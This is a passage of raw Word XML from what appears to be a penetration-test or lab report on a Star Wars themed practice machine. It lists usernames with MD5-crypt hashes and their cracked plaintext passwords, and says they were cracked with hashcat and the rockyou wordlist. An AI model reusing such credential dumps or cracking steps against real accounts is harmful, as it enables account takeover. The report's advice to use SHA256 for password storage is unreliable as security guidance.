              <w:t xml:space="preserve">Lego </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B312AE">
              <w:t>starwars</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="6D234D51" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="078A8676" w14:textId="1444D66F" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>storm_trooper_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68551057" w14:textId="1AD898C7" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>$1$.jX4bdHx$5F/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007F35EF">
              <w:t>sLNVjUPMFtLUdS.hog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007F35EF">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2260D1A5" w14:textId="6F9DF549" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B312AE">
              <w:t>starwarsbatman</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="197F05DD" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E5A0E8A" w14:textId="4C258322" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>storm_trooper_</w:t>
            </w:r>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FECB68C" w14:textId="77D76D3D" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>$1$0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007F35EF">
              <w:t>HHFKzl.$w6VyqglDCJot.Xeb</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007F35EF">
              <w:t>9slLI0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="172400CA" w14:textId="19D7D268" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
              <w:t>Password1234567</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="7BCB50A1" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="232"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3910B738" w14:textId="0092FA7C" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007F35EF">
              <w:t>imperial_guards</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5151A134" w14:textId="7E530993" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>$1$v9GI28ar$ebSf18qOk7tgu.iMqf.bi/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43A23B21" w14:textId="07AF8E04" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
              <w:t>starwars4life</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="2839B3A0" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41E130FE" w14:textId="3EE25054" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007F35EF">
              <w:t>captain_needa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77214787" w14:textId="14008179" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>$1$VtXabEV0$FO9c2OF4Qf1onEyYkq.gK/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52C1FC47" w14:textId="74E7E5B3" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
              <w:t>darksidegod@hotmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="3E8E79DA" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48ACBBCB" w14:textId="21D5CC50" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007F35EF">
              <w:t>admiral_piett</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25AD3D34" w14:textId="469B86C0" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>$1$D06DmZeK$cTG0isRNogwyCeQwCZJXF.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0211C14C" w14:textId="7F63F158" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B312AE">
              <w:t>darksideofthemoon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="1B1AE7F2" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="232"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AE56D98" w14:textId="70014978" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007F35EF">
              <w:t>admiral_ozzel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EAA5269" w14:textId="75707787" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="002578BE">
              <w:t>$1$lfbtu2co$eFPtaxBv7sX5IDp8Bc19h.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77285916" w14:textId="382EBDC5" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B312AE">
              <w:t>darksiderules</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="754F9BDA" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7240E89B" w14:textId="16EBFF1E" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007F35EF">
              <w:t>general_veers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F287D44" w14:textId="00EA972F" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="002578BE">
              <w:t>$1$.wG8JtvN$AJlGTM7XYFaY3Ezr7Av/u/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F5A7665" w14:textId="743311B2" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
              <w:t>darkside3000@hotmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="396FD84B" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A1AFD06" w14:textId="6B566712" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002578BE">
              <w:t>emperor_palpatine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4869885A" w14:textId="00EB1976" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="002578BE">
              <w:t>$1$Sr5iUN.o$hy9v3MmcpwRq/G3Dhtu2U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13A0AEE1" w14:textId="663ABF6A" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
              <w:t>912Deathstars</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="7E9FE8B6" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12C981E7" w14:textId="5A07C73D" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002578BE">
              <w:t>darth_sidious</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5789276D" w14:textId="56F5571C" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="002578BE">
              <w:t>$1$TyPfW4pp$Mp7O4bzX8bmWsGGV8ZrVY0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43BA5664" w14:textId="76CE391F" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
              <w:t>7ujMko0admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="436C4F27" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="232"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57AF94D6" w14:textId="097A7402" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002578BE">
              <w:t>boba_fett</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05EDC65D" w14:textId="07EF3B54" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002578BE">
              <w:t>$1$eOF0T0eZ$GfHV875pepnKEg.JC.zYY</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002578BE">
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DDF917D" w14:textId="60723E84" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
              <w:t>bountyhunter1976</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="38C9CBAC" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D255A85" w14:textId="2D7A16B8" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002578BE">
              <w:t>death_star_admin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D0E6182" w14:textId="2B37E3CE" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="002578BE">
              <w:t>$1$HnIyNzWr$erKQWB6ZTfw2efmZMPDME.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BBF6CBF" w14:textId="19D5294B" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
              <w:t>&lt;3DeathStars&lt;3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="625CDB76" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30975908" w14:textId="06B1034F" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002578BE">
              <w:t>darth_vader</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="393F4FB0" w14:textId="25491E99" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="002578BE">
              <w:t>$1$AnAm41bc$0TkhYTZFnI1srHEzG1TrO/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CE0ED3A" w14:textId="2978FB9B" w:rsidR="002578BE" w:rsidRDefault="00CF228F" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF228F">
              <w:t>daddy_issues-7733</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="146232E9" w14:textId="4D94B8F8" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve">All 15 </w:t>
      </w:r>
      <w:r w:rsidR="00E46727">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve">of these users had their password cracked using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E46727">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E46727">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a custom wordlist that is comprised of only public wordlists including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E46727">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E46727">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D88E812" w14:textId="71654017" w:rsidR="0030300E" w:rsidRDefault="0030300E" w:rsidP="007A5172">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5458ACA3" w14:textId="6B351C9F" w:rsidR="0030300E" w:rsidRDefault="0030300E" w:rsidP="007A5172">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Force a password change on all users and use a more robust hashing algorithm such as SHA256</w:t>
      </w:r>
      <w:r w:rsidR="002F08DB">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Blowfish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBA5D4F" w14:textId="6425FD51" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc49875742"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>/home/vagrant/passwords</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="2073E9CA" w14:textId="2729D5BC" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Hashing algorithm: MD5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18"/>
        <w:gridCol w:w="3207"/>
        <w:gridCol w:w="2891"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5172" w14:paraId="1DE1BDFF" w14:textId="77777777" w:rsidTr="007A5172">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DAF5ED6" w14:textId="20366CB8" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3207" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BD625F6" w14:textId="2173F54B" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="717B2FB2" w14:textId="5EEAF9A6" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5172" w14:paraId="757D9CDC" w14:textId="77777777" w:rsidTr="007A5172">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78429CB3" w14:textId="4FFB0E34" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>storm_trooper_1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3207" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E8280A8" w14:textId="7E5D3355" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>$1$MP1st3Cy$WXJJAIcCoDIgMbrPPY1LX1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F8E69CC" w14:textId="128B91BB" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5172" w14:paraId="7D387783" w14:textId="77777777" w:rsidTr="007A5172">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EF79762" w14:textId="299B5F15" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>storm_trooper_</w:t>
            </w:r>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3207" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B77875C" w14:textId="3E52F418" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>$1$EFSgfx8h$QIHYrOK.6mxXoRGfpgQl4/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23909889" w14:textId="4D59CACF" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00564B2B">
              <w:t>moonlight</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5172" w14:paraId="6941FBEC" w14:textId="77777777" w:rsidTr="007A5172">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4DE22F" w14:textId="51877264" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
